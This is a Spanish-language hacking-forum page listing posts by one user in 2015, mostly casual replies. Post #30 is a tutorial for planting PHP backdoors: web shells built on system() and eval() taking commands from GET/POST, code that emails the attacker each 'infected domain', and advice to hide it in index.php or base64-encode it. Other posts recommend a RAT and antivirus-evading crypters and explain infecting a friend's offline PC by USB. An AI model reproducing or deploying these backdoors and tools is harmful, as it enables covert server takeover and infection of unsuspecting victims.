Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - Payasako

#21
Off Topic / Re:Feliz cumpleaños EPSILON!!!
Julio 02, 2015, 07:59:40 AM
Usuarios que crecen junto al foro.. Eso es de ser más grande que la catedral de san Marcos!!

Feliz Cumpleaños @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta espero que lo pases de lujo !!
#22
Dudas y pedidos generales / Re:Localizar acosador
Julio 01, 2015, 09:13:23 AM
Si te llama desde un "Número privado" puedes hablar con la compañía para que rastreé la ubicación del número de telefono para poner una denuncia, o bien como te dijeron; Si ya tienes su número, agrega a Whatsapp, Line, o tal vez Snapchat, puedes conseguir información suya. También en Instagram puedes buscar a través de tus contactos

Saludos
#23
Bueno, esto del Doxing ya es algo viejo en Ingeniería Social, pero a la vez muy útil.

Excelente aporte, +1!
#24
Windows / Re:Cambiar IP Por linea de comandos
Junio 30, 2015, 07:32:08 PM
Excelente tutorial, aunque te podrías ahorrar todo eso navegando con un proxy.. Afortunadamente, mi ip es dinámica.
#25
Hacking / Re:Listado de Camaras IP disponibles
Junio 28, 2015, 09:02:02 AM
Realmente, no le veo el sentido a esto de ver cámaras.. Aparte de que está muy visto esto, es muy viejo ya.. Recuerdo cuando algunos hippies por Facebook compartían cámaras de tráfico y de despachos Jajaja

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#26
Nunca he usado una botnet pero supongo que será lo siguiente:

CitarSave Information: traducido es "Guardar información" :genius: seguramente sea para guardar los datos que ingreses.
Pool URL: Posiblemente sea la url donde vayas a poner la botnet.
Worker username: Tu usuario para iniciar sesión.
Worker password: Tu contraseña para iniciar sesión.
Threads: Ni idea
Save as: Nose xd

Saludoss
#27
Galería / Otro de mis diseños..
Junio 25, 2015, 11:10:31 AM
Hacía ya unos meses que no diseñaba algo en condiciones, y lo que he diseñado hoy ha sido pura casualidad.. Buscando en google me he encontrado con un fondo "Jester" y bueno, pues la he recortado un poco, he bordeado las esquinas y le he aplicado un desenfoque gaussiano, y el texto le he añadido un degradado blanco/gris claro y un enfoque con sombra paralela -90º y reducción de opacidad..

Después de todo eso ha salido esto:


¡Espero que les guste, Underc0deanos! y espero vuestras críticas.
#28
Dudas y pedidos generales / Re:Dudas con Hydra
Junio 18, 2015, 05:01:04 PM
Obviamente algo has echo mal, prueba a hacer de nuevo el ataque contra lo que andes "crackeando" y si no busca otro diccionario.
#29
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Bueno hoy volvia de las recuperaciones de mi instituto, y como és normal llegue encendí el ordena inicie sesión a skype y de repente se me va la conexión, bueno hasta todo me parecía normal conecte unos cables de ethernet y ya pero de pronto veo skype y veo que alguien me habla diciendo en ingles ''Un negrata me dijo que le intentastes DOSEAR con una booter de 5 dolares y aqui estoy yo el listillo''.
Bueno cuando me dijo esto ya estaba completamente seguro que era un DDoS a mi router asi que me gustaria saber como mitigar este ataque, tambien me bloqueo la entrada a páginas web ya que cuando intentaba entrar a google me redirigia a la administración de router en la pagina inicial con un codigo que creo que enviaba la contraseña a una pagina web era codigo php como no sabía que hacer encendi el APATEDNS y el WIRESHARK para capturar el tráfico quisiera saber como arreglarlo y si puedo hacer algo con la infromación que tengo en los dos programas
Lo gracioso de esto es que yo no he doseado a nadie jajajaaj

Gracias Saludos Meteor
No sé si has doseado o no, según mencionas no.. Pero bueno, esto pasa si tocas esos temas.

Curioso mensaje te dejó el Sr Hacker
CitarUn negrata me dijo que le intentastes DOSEAR con una booter de 5 dolares y aqui estoy yo el listillo

Cuando conectas el cable de Ethernet tienes que ir a la puerta de enlace (que es a donde te lleva por defecto cuando te atacan el router o por problemas técnicos), una vez alli debes acceder al panel, dependiendo de tu compañía tendrás un user y una pass diferente, yo por ejemplo tengo user y pass de mi router, (soy Jazztel) y cuando andes dentro te da diferentes opciones, y ya ahi me pierdo, no recuerdo que tenias que hacer.

Si no me equivoco, esto es un acto ilegal por parte del "Sr Hacker Pro" aparte de estár difamando algo sobre tí, está lanzando peticiones a tu router, siempre lo puedes denunciar o llamar a la centralita a que venga un técnico a reparar tu router.
#30
Seguridad web y en servidores / Backdooring con PHP.
Junio 13, 2015, 08:50:15 PM

Hola Underc0deanos, en este post hablaré sobre técnicas para tener un archivo ya sea .PHP ó .HTML a nuestro control. No me hago responsable sobre el uso que le den a este post. Solo lo hago por cuestiones educativas y éticas.

Para el que no sepa que es un Backdoor, cito a mi amiga la Wikipedia.
Citaruna puerta trasera (o en inglés backdoor), en un sistema informático es una secuencia especial dentro del código de programación, mediante la cual se pueden evitar los sistemas de seguridad del algoritmo (autentificación) para acceder al sistema.


Temario de funciones
1-System()
2-Variable Global $_SERVER[]
2.1- $_SERVER['REMOTE_ADDR']
2.2-$_SERVER['PHP_SELF']
2.3-$_SERVER['SERVER_NAME']
3-mail()
4-eval()

System()
No dudo que ya conozcas está función ya que es la más conocida para estos temas.

Para poder usarla solo debemos declarar:
Citar
Código: php
<?php
system('comando');
?>
¿Y si se nos ocurre usar $_GET o $_POST para poder ejecutar el comando que queramos?
Citar
Código: php
<?php
$var = @system($_GET['ejec']);
?>

Podriamos entrar desde:
CitarNo tienes permitido ver los links. Registrarse o Entrar a mi cuenta

un ejemplo así:
CitarNo tienes permitido ver los links. Registrarse o Entrar a mi cuenta /etc/passwd
y nos mostraría el etc/passwd o podemos poner con cualquier comando, depende el servidor
dependeran los comandos, es decir si tiene linux son comandos linux y si tiene windows pues son
comandos windows, :genius:

Si no están 100% familiarizados con linux les dejo unos comandos que podrian servirles:
Mover un archivo: mv archivo /carpeta/
Renombrar un archivo: mv archivo archivorenombrado
Crear un archivo: touch archivo
Descargar archivos: wget No tienes permitido ver los links. Registrarse o Entrar a mi cuenta (Se descargará un archivo lol.txt)
Eliminar un archivo: rm archivo
Copiar un archivo: cp archivo archivocopiado

Variable global $_SERVER
$_SERVER['REMOTE_ADDR'] – Muestra la ip de el usuario que está abriendo el script

Ejemplo:
Citar
Código: php
<?php
echo 'tu IP es'.$_SERVER['REMOTE_ADDR'];
?>

Mostrará la IP de quien lo abra.
$_SERVER['PHP_SELF']- Muestra la ruta en el que se está ejecutando el script.

Ejemplo:
Citar
Código: php
<?php
echo 'Este archivo esta en'.$_SERVER['PHP_SELF'];
?>

Mostrará la ruta de el script, es decir si estamos en No tienes permitido ver los links. Registrarse o Entrar a mi cuenta te mostrara /hola/lol.php
$_SERVER['SERVER_NAME'] – Muestra el dominio en el que se está ejecutando el script.

Ejemplo:
Citar
Código: php
<?php
echo 'Estamos en el dominio '.$_SERVER['SERVER_NAME'];
?>

Te mostrará en la pantalla Estamos en el dominio No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Mail()
Está función sirve para enviar un mail.

Modo de uso:
mail('Para', 'Asunto', 'Contenido')
NOTA: Esto se puede almacenar en variables pero como he dicho no estoy enseñando a programar PHP.

Entonces si yo pongo en un script:
Citar
Código: php
<?php
mail('[email protected]', 'Hola', 'Hola mucho gusto soy'.$_SERVER['REMOTE_ADDR);
?>
Al momento de que alguen entre me enviara un email con el asunto Hola y con el contenido "Hola
mucho gusto soy y una IP".

Bueno ya lo que sigue es a su imaginación, lo que deseen hacer.

eval()
Bien, ahora les explicaré está función. Eval es parecida a system con la diferencia en que system ejecuta comandos en el sistema y eval ejecuta código PHP.

Un claro ejemplo de uso.
Citar
Código: php
<?php
$var = eval("echo 'hola underc0de';");
?>
Si lo ejecutamos veremos que nos mostrará: hola underc0de. Al igual que system() la podemos usar con $_GET ó $_POST de la misma forma.

Ejemplo:
Citar
Código: php
<?php
$var eval($_GET['ejec']);
?>

lo usamos de está forma:
CitarNo tienes permitido ver los links. Registrarse o Entrar a mi cuenta 'hola';
y miren que claramente nos ejecutará hola.
Bueno si no están muy familiarizados con PHP está ultima función no les ayudará tanto (y si ponen el code de una shell).

Creando nuestros backdoors.
Un backdoor que ejecute comandos en un sistema pero que nos avise por email cuando alguiien haya visitado este script.
Citar
Código: php
<?php
$var = system($_POST['ejec');
$domain = $_SERVER['SERVER_NAME'];
$ruta = $_SERVER['PHP_SELF'];
mail('[email protected]', 'Nuevo dominio infectado', $domain.$ruta);
?>

Son 4 lineas que podemos incluir en cualquier script, si ponemos estas 4 lineas dentro de una shell y despues encriptamos todo en base64... ¿Quíen se dará cuenta? O también podemos incluir estas lineas digamos en el archivo index.php, asi si nos borran una shell seguimos teniendo acceso al servidor.
Citar
Código: php
<?php
$var = eval($_POST['ejec');
$domain = $_SERVER['SERVER_NAME'];
$ruta = $_SERVER['PHP_SELF'];
mail('[email protected]', 'Nuevo dominio infectado', $domain.$ruta);
?>

Bueno hay muchas, muchas formas de darle provecho a estas funciones, Yo solo explique dos.
Usen la imaginación.


Saludos, Payasako.
Viejo pdf
#31
Dudas y pedidos generales / Re:Preguntas :C
Junio 12, 2015, 12:36:36 PM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Lo que pasa es que estoy haciendo pruebas en maquina virtuales ya que en algunas empresas como el cine lo sigue usando , pero al configurar el rat al momento de que la pc se apague se podra seguir teniendo la conexión del trojano ??? porque en mi caso cuando lo apague y de ahy lo prendi no habia conexión a eso me refiero :c
¿Configuraste bien el server? Revísalo, normalmente cuando se apaga la pc te avisa de que está apagada.. Y Cuando se enciende te sale encendido en la lista de infectados.
#32
Dudas y pedidos generales / Re:Preguntas :C
Junio 12, 2015, 11:49:40 AM
Supongo que lo que estás buscando es un RAT.. en fin,  creo que el más usado es SpyNet 2.6 es bueno y tal.. no te puedo pasar descarga ya que no tengo una 100% fiable.

Aquí te dejo algunos Crypters
CitarCrypter Matrix by H-SDR 1/35: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
KzCrypter v1.0: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
The Poison Ivy Cripter 0.1 -By DRIGIN-: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


PD: No te aconsejo usar Windows Xp, ya que es muy vulnerable y el servicio finalizó a finales de 2014, (Por Septiembre o así)
#33
Tu mismo puedes crear un payload para Android..
> No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Alomejor no sabias que meterpreter estaba disponible para Android..
> No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#34
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tengo servicio de internet en mi casa, soy amigo de Jesús, el hijo de Dios y me concede todo el $uaj.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Yo tengo mi propia linea contratada pero no quita que alguna vez pique de otra red ajena a la mia  ;D Aparte! no es nada ilegal conectarme a la red de otra persona  ;D ;D ;D Es su red que esta entrando en mi casa sin mi permiso , asi que puedo conectarme  :)
Conectarte a la red del vecino sin su consentimiento es delito, "Utilizar wi-fi ajeno puede ser un delito de descubrimiento y revelación de secretos", Puedes echar un vistazo en el Código Penal, Artículos 255 y 256, que hablan de las defraudaciones del fluido eléctrico y análogas y que conllevan unas penas muy leves.
Se que es un delito y se que es revelación de secretos Pero quien aquí no coje red wifi de "vecino" ?

Enviado desde mi SM-G900F mediante Tapatalk
El 12% de los españoles coje wifi del vecino sin su consentimiento, yo pertenezco al 88% que usa internet propio.
#35
No tengo servicio de internet en mi casa, soy amigo de Jesús, el hijo de Dios y me concede todo el $uaj.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Yo tengo mi propia linea contratada pero no quita que alguna vez pique de otra red ajena a la mia  ;D Aparte! no es nada ilegal conectarme a la red de otra persona  ;D ;D ;D Es su red que esta entrando en mi casa sin mi permiso , asi que puedo conectarme  :)
Conectarte a la red del vecino sin su consentimiento es delito, "Utilizar wi-fi ajeno puede ser un delito de descubrimiento y revelación de secretos", Puedes echar un vistazo en el Código Penal, Artículos 255 y 256, que hablan de las defraudaciones del fluido eléctrico y análogas y que conllevan unas penas muy leves.

#36
Estaba viendo el video y he pensado: Vaya vicio tiene este chaval, como escribe de rápido, y resulta que lo has puesto rapido jajajaj interesante tutorial bro, muy  útil.

PD: El de la canción es Hard Gz no?
#37
CitarCreo que también es mala costumbre pensar que cuando usan la palabra "virus" se asimila con un troyano, sabiendo los diferentes tipos de virus que existen
Exacto, hay muchos tipos de "virus" no siempre tiene por qué ser un troyano..

CitarSi no esta conectado a internet, aunque lo infecte ¿por donde se conecta a la víctima xD?
Desafortunadamente, todavía hay amigos que te pueden colar un server metido en un pen lo que hace que la víctima sin conexión a internet al ejecutar el server sea infectado, o en un pen se puede hacer un autoejecutable. No tiene nada que ver que esté conectado o no a internet para que le puedan infectar desde un pendrive.

Haber, te pongo un ejemplo; Yo tengo un RAT y hago el troyanito con el nombre "ejemplo.exe", si ese archivo lo meto en un pendrive y lo paso a un amigo, aunque mi amigo no tenga conexión a internet, puede ejecutarlo y quedar infectado.
#38
Off Topic / Re:Feliz Cumpleaños, Blackdrake!!!
Junio 09, 2015, 05:30:04 PM
Un poco atrasadas, pero felicidades @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta que recibas muchos regalos, haber si yo puedo hacerte alguno.. Revisaré si aun queda money en my paypal.
#39
CitarEl antivirus o Firewall realmente funcionan? (Cual puedo descargar ?)
Supongo que con el Firewall de Windows vale.. Lo del antivirus, leete esto que posteé en ZanutSec.. Realmente, el antivirus no es necesario.

> ¿Es necesario un antivirus en tu ordenador?.. No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Citar Que me manual o guía o algo puedo leer o ver para aprender a crackear o bien para aprender hacking básico
En el foro podrás encontrar guías sobre hacking básico y puedes descargarlas en PDF.

CitarY por ultimo que lenguaje me recomendáis aprender ?
Depende de lo que quieras hacer, si estás aprendiendo.. HTML (No se considera un lenguaje, pero de él parte HTML5), HTML5, PHP, CSS, CSS3.. Y Si quieres más avanzado, Java, .NET, C#, C++..
#40
Diseño UX/UI / Re:Firma 2015
Junio 08, 2015, 01:42:31 PM
Podrias hacerme una porfavor? Gracias que diga Payasako